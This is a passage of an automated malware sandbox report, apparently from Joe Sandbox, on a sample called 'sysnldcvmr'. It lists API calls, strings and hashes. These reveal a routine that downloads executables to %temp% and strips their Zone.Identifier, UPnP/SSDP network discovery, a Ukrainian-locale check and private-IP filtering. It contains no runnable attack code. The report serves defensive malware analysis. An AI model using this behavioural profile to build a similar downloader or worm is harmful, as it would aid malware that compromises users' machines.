                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 37cf53b06a8410454a1798d38201431a2759ba3d0e51bc8328308ef715640324
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3F41B270640301ABD3209F749C4AF4B77E4AF48710F108A2DF669EA2D4E7F4E845875A
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 0040D72A
                                                                                                                                                                                                                                                    • htons.WS2_32(0000076C), ref: 0040D760
                                                                                                                                                                                                                                                    • inet_addr.WS2_32(239.255.255.250), ref: 0040D76F
                                                                                                                                                                                                                                                    • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040D78D
                                                                                                                                                                                                                                                      • Part of subcall function 0040AA80: htons.WS2_32(00000050), ref: 0040AAAD
                                                                                                                                                                                                                                                      • Part of subcall function 0040AA80: socket.WS2_32(00000002,00000001,00000000), ref: 0040AACD
                                                                                                                                                                                                                                                      • Part of subcall function 0040AA80: connect.WS2_32(000000FF,?,00000010), ref: 0040AAE6
                                                                                                                                                                                                                                                      • Part of subcall function 0040AA80: getsockname.WS2_32(000000FF,?,00000010), ref: 0040AB18
                                                                                                                                                                                                                                                    • bind.WS2_32(000000FF,?,00000010), ref: 0040D7C3
                                                                                                                                                                                                                                                    • lstrlenA.KERNEL32(00411760,00000000,?,00000010), ref: 0040D7DC
                                                                                                                                                                                                                                                    • sendto.WS2_32(000000FF,00411760,00000000), ref: 0040D7EB
                                                                                                                                                                                                                                                    • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040D805
                                                                                                                                                                                                                                                      • Part of subcall function 0040D890: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040D8DE
                                                                                                                                                                                                                                                      • Part of subcall function 0040D890: Sleep.KERNEL32(000003E8), ref: 0040D8EE
                                                                                                                                                                                                                                                      • Part of subcall function 0040D890: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040D90B
                                                                                                                                                                                                                                                      • Part of subcall function 0040D890: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040D921
                                                                                                                                                                                                                                                      • Part of subcall function 0040D890: StrChrA.SHLWAPI(?,0000000D), ref: 0040D94E
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                                                                                                                                                                                                                                    • String ID: 239.255.255.250
                                                                                                                                                                                                                                                    • API String ID: 726339449-2186272203
                                                                                                                                                                                                                                                    • Opcode ID: 79f07a221ebe8da2b3f6cc1201247ff83fcd4ebf719402c26e706ca4d9eeb493
                                                                                                                                                                                                                                                    • Instruction ID: cd66526dcba05d1bd7c9b39ec2501b61c01db5f9fe0ef632d0235bd6d7545576
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 79f07a221ebe8da2b3f6cc1201247ff83fcd4ebf719402c26e706ca4d9eeb493
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F64137B5E00208EBDB04DFE4D889BEEBBB5AF48304F108169E515B7390E7B45A44CB69
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
                                                                                                                                                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
                                                                                                                                                                                                                                                    • htons.WS2_32(?), ref: 00401508
                                                                                                                                                                                                                                                    • setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
                                                                                                                                                                                                                                                    • bind.WS2_32(?,?,00000010), ref: 0040153B
                                                                                                                                                                                                                                                      • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
                                                                                                                                                                                                                                                      • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
                                                                                                                                                                                                                                                      • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C
                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4174406920-0
                                                                                                                                                                                                                                                    • Opcode ID: 13d0b41af5316ea83091654edbd74b2561ef0770db19727e5a4322e68b78e0ff
                                                                                                                                                                                                                                                    • Instruction ID: 37c3663fbc3c265b2fc21df898a790ae91858f9cd77d7d33374cf85f68206479
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 13d0b41af5316ea83091654edbd74b2561ef0770db19727e5a4322e68b78e0ff
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0331C871A443016BE320DF649C46F9BB6E0AF48B10F50493DF655EB2D0D3B5D544879A
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040CD02
                                                                                                                                                                                                                                                    • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040CD28
                                                                                                                                                                                                                                                    • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040CD5F
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040CD74
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(00000001), ref: 0040CD94
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040CD9A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CountTick$Sleepioctlsocketrecv
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 107502007-0
                                                                                                                                                                                                                                                    • Opcode ID: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                                                                                                                                                                                                    • Instruction ID: 0ae774020e9f5877292fe20f0fc2b5ec497076074ae846a5bd2c446efb985cc9
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 37a822bdddda98564e28443683f910c137df2279eb61dd0ccc6bd5f83a2e5522
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4431FC74900209EFCB04DFA8D988BEE7BB1FF44315F10867AE825A7290D7749A51CF95
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • htons.WS2_32(00000050), ref: 0040AAAD
                                                                                                                                                                                                                                                      • Part of subcall function 0040AA40: inet_addr.WS2_32(0040AAC1), ref: 0040AA4A
                                                                                                                                                                                                                                                      • Part of subcall function 0040AA40: gethostbyname.WS2_32(?), ref: 0040AA5D
                                                                                                                                                                                                                                                    • socket.WS2_32(00000002,00000001,00000000), ref: 0040AACD
                                                                                                                                                                                                                                                    • connect.WS2_32(000000FF,?,00000010), ref: 0040AAE6
                                                                                                                                                                                                                                                    • getsockname.WS2_32(000000FF,?,00000010), ref: 0040AB18
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    • www.update.microsoft.com, xrefs: 0040AAB7
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                                                                                                                                                                                                    • String ID: www.update.microsoft.com
                                                                                                                                                                                                                                                    • API String ID: 4063137541-1705189816
                                                                                                                                                                                                                                                    • Opcode ID: 17f60f9418bba267ceb1c0f8ef6a4cf2a322d26a33b8be3941e3699853ecfadc
                                                                                                                                                                                                                                                    • Instruction ID: 53d455f177803832f36bb1991f027e84745f2e467cc2e97abaa02536582c95dc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 17f60f9418bba267ceb1c0f8ef6a4cf2a322d26a33b8be3941e3699853ecfadc
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09210BB5E103099BCB04DFE8D946AEEBBB5AF4C300F104169E605F7390E7745A45CBAA
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • NtQueryVirtualMemory.NTDLL ref: 0040F162
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: MemoryQueryVirtual
                                                                                                                                                                                                                                                    • String ID: oA$ oA$ oA
                                                                                                                                                                                                                                                    • API String ID: 2850889275-3725432611
                                                                                                                                                                                                                                                    • Opcode ID: 2b8d52b38e95f23bdc674a950ebd3d706a7c1f13ecb44ec4cb7d27a974556661
                                                                                                                                                                                                                                                    • Instruction ID: 156301bb8e4ac48afa8ff6eb2b3679a4760495b1ce114817f826733a91984271
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2b8d52b38e95f23bdc674a950ebd3d706a7c1f13ecb44ec4cb7d27a974556661
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3561D635710612CFDB35CE29C88066A33A2EB85354B25857FD805EBAD5E73ADC4AC68C
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CryptAcquireContextW.ADVAPI32(Bz@,00000000,00000000,00000001,F0000040,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BE93
                                                                                                                                                                                                                                                    • CryptGenRandom.ADVAPI32(Bz@,?,00000000,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BEA9
                                                                                                                                                                                                                                                    • CryptReleaseContext.ADVAPI32(Bz@,00000000,?,?,0040BED9,Bz@,00000004,?,?,0040BF0E,000000FF), ref: 0040BEB5
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Crypt$Context$AcquireRandomRelease
                                                                                                                                                                                                                                                    • String ID: Bz@
                                                                                                                                                                                                                                                    • API String ID: 1815803762-793989200
                                                                                                                                                                                                                                                    • Opcode ID: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
                                                                                                                                                                                                                                                    • Instruction ID: 6606508483a264dc8c12e3925f56bba8ecc3e33b87176868a4d93c44792bd7d2
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a24c2434b3afb1955293fcca0a538135b7e24827869c87ceb3569772b55bea96
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 87E01275650208BBDB24CFD1EC49FDA776CEB48700F108154F70997280DBB5EA4097A8
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040D55D,00000000), ref: 004013D5
                                                                                                                                                                                                                                                    • socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                                                                                                                                                                                                                                    • bind.WS2_32(?,?,00000010), ref: 00401429
                                                                                                                                                                                                                                                      • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401346
                                                                                                                                                                                                                                                      • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 00401352
                                                                                                                                                                                                                                                      • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D55D,00000000), ref: 0040135C
                                                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401459
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3943618503-0
                                                                                                                                                                                                                                                    • Opcode ID: 68d947c41bdf9a0382415b4c621d22e40d460daea97f1b1ba8e6dd9fd87ffbf0
                                                                                                                                                                                                                                                    • Instruction ID: f9ba2cfc99a050ce4a8bfcbff2653574801cca82506c6568c29975d90a0f09d7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 68d947c41bdf9a0382415b4c621d22e40d460daea97f1b1ba8e6dd9fd87ffbf0
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 61118974A417106FE320DF749C0AF877AE0AF04B54F50892DF699E72E1E3B49544879A
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetLocaleInfoA.KERNEL32(00000400,00000007,?,0000000A,?,?,00407678), ref: 0040E743
                                                                                                                                                                                                                                                    • strcmp.NTDLL ref: 0040E752
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: InfoLocalestrcmp
                                                                                                                                                                                                                                                    • String ID: UKR
                                                                                                                                                                                                                                                    • API String ID: 3191669094-64918367
                                                                                                                                                                                                                                                    • Opcode ID: d79b0aba27e6a1949038eec9da23d17ae17cae41793c3222a97234fc67286889
                                                                                                                                                                                                                                                    • Instruction ID: f5851dfa2a24cd6eecb4ca89505c7c91e938839c44774f0d29bfbb74be006053
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d79b0aba27e6a1949038eec9da23d17ae17cae41793c3222a97234fc67286889
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 10E02B36E44308B6D900B6B15E03FEA772C5711B09F0045B6FF14A71C1F5B5922AC39B

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0040EAE9
                                                                                                                                                                                                                                                    • srand.MSVCRT ref: 0040EAF0
                                                                                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040EB10
                                                                                                                                                                                                                                                    • strlen.NTDLL ref: 0040EB1A
                                                                                                                                                                                                                                                    • mbstowcs.NTDLL ref: 0040EB31
                                                                                                                                                                                                                                                    • rand.MSVCRT ref: 0040EB39
                                                                                                                                                                                                                                                    • rand.MSVCRT ref: 0040EB4D
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040EB74
                                                                                                                                                                                                                                                    • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040EB8A
                                                                                                                                                                                                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EBB9
                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040EBE8
                                                                                                                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040EC1B
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(000000FF,?,00000000,?,00000000), ref: 0040EC4C
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040EC5B
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040EC74
                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040EC84
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 0040ECA5
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 0040ECCD
                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040ECE3
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0040ECF0
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040ECFD
                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0040ED0A
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 0040ED15
                                                                                                                                                                                                                                                    • rand.MSVCRT ref: 0040ED2A
                                                                                                                                                                                                                                                    • Sleep.KERNEL32 ref: 0040ED3B
                                                                                                                                                                                                                                                    • rand.MSVCRT ref: 0040ED41
                                                                                                                                                                                                                                                    • rand.MSVCRT ref: 0040ED55
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040ED7C
                                                                                                                                                                                                                                                    • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040ED99
                                                                                                                                                                                                                                                    • wsprintfW.USER32 ref: 0040EDB9
                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040EDC9
                                                                                                                                                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 0040EDEA
                                                                                                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 0040EE11
                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 0040EE20
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$Internetrand$CloseDeleteHandleSleepwsprintf$ExitOpenProcess$CountCreateDownloadEnvironmentExpandReadStringsTickWritembstowcssrandstrlen
                                                                                                                                                                                                                                                    • String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36$]u@$.ou
                                                                                                                                                                                                                                                    • API String ID: 3709769524-481826255
                                                                                                                                                                                                                                                    • Opcode ID: f19e2e49e4841eae6c8170c725b321c375bdafcc36d8594c690cf09b2969f998
                                                                                                                                                                                                                                                    • Instruction ID: cec73e08c6f056f0168379cb50c3066ff26982e4471096ca0769119a3115f73e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f19e2e49e4841eae6c8170c725b321c375bdafcc36d8594c690cf09b2969f998
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E81E9B5900318ABE720DB61DC49FEA3379AB88701F0484FDF609A51C1DAB99BD4CF59

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 450 40aea0-40aeb7 call 40add0 453 40aeb9 450->453 454 40aebe-40aeda call 40aa20 strcmp 450->454 455 40b145-40b148 453->455 458 40aee1-40aefd call 40aa20 strstr 454->458 459 40aedc 454->459 462 40af40-40af5c call 40aa20 strstr 458->462 463 40aeff-40af1b call 40aa20 strstr 458->463 459->455 470 40af5e-40af7a call 40aa20 strstr 462->470 471 40af9f-40afbb call 40aa20 strstr 462->471 468 40af3b 463->468 469 40af1d-40af39 call 40aa20 strstr 463->469 468->455 469->462 469->468 478 40af9a 470->478 479 40af7c-40af98 call 40aa20 strstr 470->479 480 40afbd-40afd9 call 40aa20 strstr 471->480 481 40affe-40b014 EnterCriticalSection 471->481 478->455 479->471 479->478 492 40aff9 480->492 493 40afdb-40aff7 call 40aa20 strstr 480->493 482 40b01f-40b028 481->482 485 40b059-40b064 call 40b150 482->485 486 40b02a-40b03a 482->486 499 40b13a-40b13f LeaveCriticalSection 485->499 500 40b06a-40b078 485->500 489 40b057 486->489 490 40b03c-40b055 call 40d4a0 486->490 489->482 490->485 492->455 493->481 493->492 499->455 502 40b07a 500->502 503 40b07e-40b08f call 409d90 500->503 502->503 503->499 506 40b095-40b0b2 call 40d4a0 503->506 509 40b0b4-40b0c4 506->509 510 40b10a-40b122 506->510 511 40b0d0-40b108 call 40a1b0 509->511 512 40b0c6-40b0ce Sleep 509->512 513 40b128-40b133 call 40b150 510->513 511->513 512->509 513->499 518 40b135 call 40ab80 513->518 518->499
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 0040ADD0: gethostname.WS2_32(?,00000100), ref: 0040ADEC
                                                                                                                                                                                                                                                      • Part of subcall function 0040ADD0: gethostbyname.WS2_32(?), ref: 0040ADFE
                                                                                                                                                                                                                                                    • strcmp.NTDLL ref: 0040AED0
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000007.00000002.1572601555.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572553452.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572624193.0000000000410000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000007.00000002.1572641335.0000000000414000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: gethostbynamegethostnamestrcmp
                                                                                                                                                                                                                                                    • String ID: .10$.10.$.127$.127.$.192$.192.$0.0.0.0$10.$127.$192.
                                                                                                                                                                                                                                                    • API String ID: 2906596889-2213908610
                                                                                                                                                                                                                                                    • Opcode ID: 7160486eb3816073c061a65ecf3a9a7d1c79094514eb017bcdc9a8df335f0911
                                                                                                                                                                                                                                                    • Instruction ID: 458019ee7e4258451e0266341ac37eb9dcc64f8272ac2f4812142232ba39784f
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7160486eb3816073c061a65ecf3a9a7d1c79094514eb017bcdc9a8df335f0911
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 406162B4A00305BBDF00EF65EC56BAA37659B10348F14847EE8496A3C1E73DE964C79E

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
